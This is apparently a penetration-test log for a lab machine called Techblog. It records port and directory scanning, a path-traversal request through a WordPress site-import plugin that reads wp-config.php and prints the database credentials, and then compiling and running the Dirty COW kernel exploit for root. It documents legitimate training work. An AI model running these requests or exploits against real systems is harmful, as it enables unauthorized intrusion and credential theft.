Techblog

๐Ÿงช Pentest Log: {{date:2025-08-24}}

๐Ÿ” Target Information

ip=10.11.1.3

๐Ÿ“ก Enumeration

๐Ÿ”Œ Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

The post says the website has siteimport installed, google for "siteimport exploit", found

https://www.exploit-db.com/exploits/39558

๐Ÿ’ฃ Exploitation

๐Ÿ“Œ Vulnerability Summary

๐Ÿš€ Exploit Execution

๐Ÿ”ง Exploit Method

Tool / Script Used:

GET /wp-content/plugins/site-import/admin/page.php?url=../../../../../../../var/www/html/wp-config.php HTTP/1.1
Host: 10.11.1.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: wfvt_2535711778=68ab71719866a; wordfence_verifiedHuman=5024043dda1f120635b13b607050c4af; wordpress_test_cookie=WP+Cookie+check; wfvt_3269544153=68ab6c2cba2b7
Upgrade-Insecure-Requests: 1
Priority: u=0, i



/** MySQL database username */
define('DB_USER', 'techblog');

/** MySQL database password */
define('DB_PASSWORD', 'z8n#DZf@Sa#X!4@tqG');

Found credential

techblog:z8n#DZf@Sa#X!4@tqG

๐Ÿงฌ Privilege Escalation

๐Ÿ‘ค Current Access

๐Ÿ” Enumeration

System Info:

uname -a

found kernel version

3.10.0-123.el7.x86_64

Google for kernel exploit, found

Dirty Cow
https://www.exploit-db.com/exploits/40839

๐Ÿ”“ Privilege Escalation Exploit

๐Ÿ“Œ Exploit Summary

๐Ÿ”ง Exploit Steps

gcc -pthread 40839.c -o dirty -lcrypt -static

./dirty